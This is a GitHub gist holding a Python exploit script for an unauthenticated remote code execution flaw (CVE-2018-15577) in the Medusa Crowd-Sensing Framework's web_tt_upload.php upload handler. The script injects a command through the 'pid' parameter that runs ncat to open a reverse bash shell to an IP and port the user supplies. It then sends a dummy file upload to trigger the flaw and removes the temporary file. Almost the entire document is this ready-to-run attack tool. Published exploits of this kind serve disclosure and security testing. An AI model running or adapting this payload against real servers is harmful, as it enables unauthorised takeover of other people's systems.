Created
August 20, 2018 15:55
-
-
Save mhaskar/74107e04a2f90cab195ff8e5aa7b85c3 to your computer and use it in GitHub Desktop.
Unauthenticated RCE - Medusa Crowd-Sensing Framework
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ''' | |
| # Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
| # Date: 16/08/2018 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # CVE : CVE-2018-15577 - RESERVED | |
| # Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
| # Version: V1.0 | |
| # Tested on: Ubuntu 16.04 / PHP 7.0.28 | |
| ''' | |
| import requests | |
| import sys | |
| import os | |
| if len(sys.argv) != 4: | |
| print "[+] Usage : ./exploit.py url local_ip local_port" | |
| sys.exit(0) | |
| url = sys.argv[1] | |
| ip = sys.argv[2] | |
| port = sys.argv[3] | |
| payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port) | |
| full_url = url + payload | |
| # create a file with some junk data to send | |
| os.system("echo 111 > /tmp/medusa-exploit.txt") | |
| files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")} | |
| print "[+]Sending Payload , check your shell !" | |
| requests.post(full_url, files=files) | |
| # remove the created file | |
| os.system("rm /tmp/medusa-exploit.txt") | |
| print "[+]Temp file removed !" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment